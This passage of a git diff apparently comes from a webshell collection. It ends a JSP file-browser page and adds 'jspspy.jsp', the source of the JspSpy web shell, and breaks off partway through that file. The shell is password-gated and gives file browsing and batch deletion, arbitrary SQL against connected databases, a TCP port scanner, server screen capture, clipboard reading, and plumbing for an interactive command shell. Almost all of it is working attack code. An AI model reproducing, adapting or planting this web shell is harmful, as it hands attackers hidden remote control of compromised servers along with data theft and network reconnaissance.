Move selected file(s) + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(MOVE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), false)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + // This ensures that new_dir is a directory + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + else if (!f.canWrite() || !f.renameTo(new File(new_dir + + f.getAbsolutePath().substring(dir.length())))) { + request.setAttribute("error", "Cannot move " + f.getAbsolutePath() + + ". Move aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Copy Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(COPY_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = (String) request.getAttribute("dir"); + if (!dir.endsWith(File.separator)) dir += File.separator; + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + try { + byte buffer[] = new byte[0xffff]; + for (int i = 0; i < v.size(); i++) { + File f_old = (File) v.get(i); + File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); + if (!isAllowed(f_old, false)|| !isAllowed(f_new, true)){ + request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); + error = true; + } + else if (f_old.isDirectory()) f_new.mkdirs(); + // Overwriting is forbidden + else if (!f_new.exists()) { + copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); + } + else { + // File exists + request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() + + ", file already exists. Copying aborted"); + error = true; + break; + } + } + } + catch (IOException e) { + request.setAttribute("error", "Error " + e + ". Copying aborted"); + error = true; + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Directory viewer + if (dir_view && request.getAttribute("dir") != null) { + File f = new File("" + request.getAttribute("dir")); + //Check, whether the dir exists + if (!f.exists() || !isAllowed(f, false)) { + if (!f.exists()){ + request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); + } + else{ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + //if attribute olddir exists, it will change to olddir + if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")), false)) { + f = new File("" + request.getAttribute("olddir")); + } + //try to go to the parent dir + else { + if (f.getParent() != null && isAllowed(f, false)) f = new File(f.getParent()); + } + //If this dir also do also not exist, go back to browser.jsp root path + if (!f.exists()) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) path = new File( + application.getRealPath(request.getRequestURI())).getParent(); + + if (path == null) // handle the case were we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + f = new File(path); + } + if (isAllowed(f, false)) request.setAttribute("dir", f.getAbsolutePath()); + else request.setAttribute("dir", null); + } +%> + +<%=request.getAttribute("dir")%> + + +<% + //Output message + if (request.getAttribute("message") != null) { + out.println("
    "); + out.println(request.getAttribute("message")); + out.println("
    "); + } + //Output error + if (request.getAttribute("error") != null) { + out.println("
    "); + out.println(request.getAttribute("error")); + out.println("
    "); + } + if (request.getAttribute("dir") != null){ +%> + +
    + Filename filter: +

    + +<% + // Output the table, starting with the headers. + String dir = URLEncoder.encode("" + request.getAttribute("dir")); + String cmd = browser_name + "?dir=" + dir; + int sortMode = 1; + if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request + .getParameter("sort")); + int[] sort = new int[] {1, 2, 3, 4}; + for (int i = 0; i < sort.length; i++) + if (sort[i] == sortMode) sort[i] = -sort[i]; + out.print("" + + "" + + "" + + "" + + ""); + if (!READ_ONLY) out.print (""); + out.println(""); + char trenner = File.separatorChar; + // Output the Root-Dirs, without FORBIDDEN_DRIVES + File[] entry = File.listRoots(); + for (int i = 0; i < entry.length; i++) { + boolean forbidden = false; + for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { + if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; + } + if (!forbidden) { + out.println(""); + out.println(""); + } + } + // Output the parent directory link ".." + if (f.getParent() != null) { + out.println(""); + out.println(""); + } + // Output all files and dirs and calculate the number of files and total size + entry = f.listFiles(); + if (entry == null) entry = new File[] {}; + long totalSize = 0; // The total size of the files in the current directory + long fileCount = 0; // The count of files in the current working directory + if (entry != null && entry.length > 0) { + Arrays.sort(entry, new FileComp(sortMode)); + for (int i = 0; i < entry.length; i++) { + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String type = "File"; // This String will tell the extension of the file + if (entry[i].isDirectory()) type = "DIR"; // It's a DIR + else { + String tempName = entry[i].getName().replace(' ', '_'); + if (tempName.lastIndexOf('.') != -1) type = tempName.substring( + tempName.lastIndexOf('.')).toLowerCase(); + } + String ahref = ""; + String link = buf; // The standard view link, uses Mime-type + if (entry[i].isDirectory()) { + if (entry[i].canRead() && USE_DIR_PREVIEW) { + //Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip + File[] fs = entry[i].listFiles(); + if (fs == null) fs = new File[] {}; + Arrays.sort(fs, new FileComp()); + StringBuffer filenames = new StringBuffer(); + for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { + String fname = conv2Html(fs[i2].getName()); + if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); + else filenames.append(fname + ";"); + } + if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); + else if (filenames.length() > 0) filenames + .setLength(filenames.length() - 1); + link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" + + FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].canRead()) { + link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; + } + else link = FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].isFile()) { //Entry is file + totalSize = totalSize + entry[i].length(); + fileCount = fileCount + 1; + if (entry[i].canRead()) { + dlink = ahref + "downfile=" + name + "\">Download"; + //If you click at the filename + if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" + + buf + ""; + else link = ahref + "file=" + name + "\">" + buf + ""; + if (entry[i].canWrite()) { // The file can be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">Edit"; + } + else { // If the file cannot be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">View"; + } + } + else { + link = buf; + } + } + String date = dateFormat.format(new Date(entry[i].lastModified())); + out.println(""); + if (entry[i].canRead()) { + out.println(""); + } + else { + out.println(""); + } + out.print(""); + if (entry[i].isDirectory()) out.print(""); + else { + out.print(""); + } + out.println(""); // The download link + if (!READ_ONLY) + out.print (""); // The edit link (or view, depending) + out.println(""); + } + }%> +
     NameSizeTypeDate  
     "); + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String buf = entry[i].getAbsolutePath(); + out.println("  [" + buf + "]"); + out.print("    
    "); + out.println("  " + FOL_IMG + "[..]"); + out.print("    
     " + link + " " + + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) + date + "" + // The date the file was created + dlink + "" + elink + "
    + Select all +

    + + <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> + +

    + "> + + + <% if (!READ_ONLY) {%> + + <% } %> + <% if (!READ_ONLY) {%> +
    + + + + + + + <% } %> +
    +
    +
    + <% if (ALLOW_UPLOAD) { %> +
    + "> + + + +
    + <%} %> + <% if (NATIVE_COMMANDS) {%> +
    + "> + + + +
    <% + }%> +
    + <%}%> +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + +<% + } +%> diff --git a/jsp/hackk8/JSP/other/jspspy.jsp b/jsp/hackk8/JSP/other/jspspy.jsp new file mode 100644 index 0000000..219d801 --- /dev/null +++ b/jsp/hackk8/JSP/other/jspspy.jsp @@ -0,0 +1,2329 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* Code By admin +* Date 2009-12-17 +* Blog http://www.baidu.com/ +* Huan . I Love You. +*/ +private static final String PW = "max"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒) : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
